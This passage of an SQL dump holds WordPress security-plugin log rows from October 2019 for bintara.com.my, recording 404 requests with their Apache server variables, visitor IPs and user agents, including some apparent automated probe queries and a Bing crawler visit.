18:15:33',34968424,36766408,'https://bintara.com.my/dev/?key=testActivation',1,0,'132.148.80.15'),(28716,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp2/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/wp2/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa81Pcf2CQI4cfFpC9B@OQAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/wp2/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa81Pcf2CQI4cfFpC9B@OQAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"51840\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:10:\"SCRIPT_URL\";s:5:\"/wp2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa81Pcf2CQI4cfFpC9B@OQAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571763517.8277\";s:12:\"REQUEST_TIME\";s:10:\"1571763517\";}}','notice','2019-10-22 16:58:39','2019-10-22 16:58:38',34970464,36772528,'https://bintara.com.my/wp2/?key=testActivation',1,0,'151.80.54.15'),(28715,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/wp2/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/wp2/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa808Mf2CQI4cfFpC9B@GQAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/wp2/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa808Mf2CQI4cfFpC9B@GQAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"36358\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:10:\"SCRIPT_URL\";s:5:\"/wp2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa808Mf2CQI4cfFpC9B@GQAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571763440.2183\";s:12:\"REQUEST_TIME\";s:10:\"1571763440\";}}','notice','2019-10-22 16:57:21','2019-10-22 16:57:20',34969872,36770728,'https://bintara.com.my/wp2/?initiationactivity=initiationready',1,0,'151.80.54.15'),(28714,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/blogs/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:7:\"/blogs/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa8pXTbsgZA4pads4ISspgAAAEU\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/blogs/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa8pXTbsgZA4pads4ISspgAAAEU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"193.70.2.138\";s:11:\"REMOTE_PORT\";s:5:\"58671\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:10:\"SCRIPT_URL\";s:7:\"/blogs/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa8pXTbsgZA4pads4ISspgAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571760478.0175\";s:12:\"REQUEST_TIME\";s:10:\"1571760478\";}}','notice','2019-10-22 16:08:00','2019-10-22 16:07:58',34971936,36771800,'https://bintara.com.my/blogs/?initiationactivity=initiationready',1,0,'193.70.2.138'),(28713,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/blogs/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:7:\"/blogs/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa8o6DbsgZA4pads4ISsjQAAAEk\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/blogs/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa8o6DbsgZA4pads4ISsjQAAAEk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"193.70.2.138\";s:11:\"REMOTE_PORT\";s:5:\"47090\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:10:\"SCRIPT_URL\";s:7:\"/blogs/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa8o6DbsgZA4pads4ISsjQAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571760360.1316\";s:12:\"REQUEST_TIME\";s:10:\"1571760360\";}}','notice','2019-10-22 16:06:02','2019-10-22 16:06:00',34968704,36769896,'https://bintara.com.my/blogs/?key=testActivation',1,0,'193.70.2.138'),(28712,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/hp-designjet-printers/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa8fNsf2CQI4cfFpC9BzMwAAANY\";s:12:\"REDIRECT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.10\";s:11:\"REMOTE_PORT\";s:5:\"18258\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:10:\"SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa8fNsf2CQI4cfFpC9BzMwAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571757878.7873\";s:12:\"REQUEST_TIME\";s:10:\"1571757878\";}}','notice','2019-10-22 15:24:40','2019-10-22 15:24:39',33802208,35601528,'https://bintara.com.my/hp-designjet-printers/',1,0,'157.55.39.10'),(28711,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2372.400 QQBrowser/9.5.11096.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.141.237\";s:11:\"REMOTE_PORT\";s:5:\"39574\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa8FV8f2CQI4cfFpC9Bk5wAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571751255.7782\";s:12:\"REQUEST_TIME\";s:10:\"1571751255\";}}','notice','2019-10-22 13:34:17','2019-10-22 13:34:16',34916448,36733464,'https://bintara.com.my/?page_id=18/contact.php',1,0,'132.148.141.237'),(28710,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"FBAF8567-F349-4E30-8DEB-86BB27B1436B\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa78-NaMiBShLW1lPtfvfwAAABg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"55246\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa78-NaMiBShLW1lPtfvfwAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571749116.4994\";s:12:\"REQUEST_TIME\";s:10:\"1571749116\";}}','notice','2019-10-22 12:58:39','2019-10-22 12:58:36',35662968,37463360,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28709,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:41:\"/test/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa74Y9aMiBShLW1lPtfuTwAAAAQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa74Y9aMiBShLW1lPtfuTwAAAAQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.100.249.231\";s:11:\"REMOTE_PORT\";s:5:\"38738\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:10:\"SCRIPT_URL\";s:6:\"/test/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa74Y9aMiBShLW1lPtfuTwAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571747939.9222\";s:12:\"REQUEST_TIME\";s:10:\"1571747939\";}}','notice','2019-10-22 12:39:02','2019-10-22 12:39:00',34970112,36770752,'https://bintara.com.my/test/?initiationactivity=initiationready',1,0,'5.100.249.231'),(28708,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/test/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 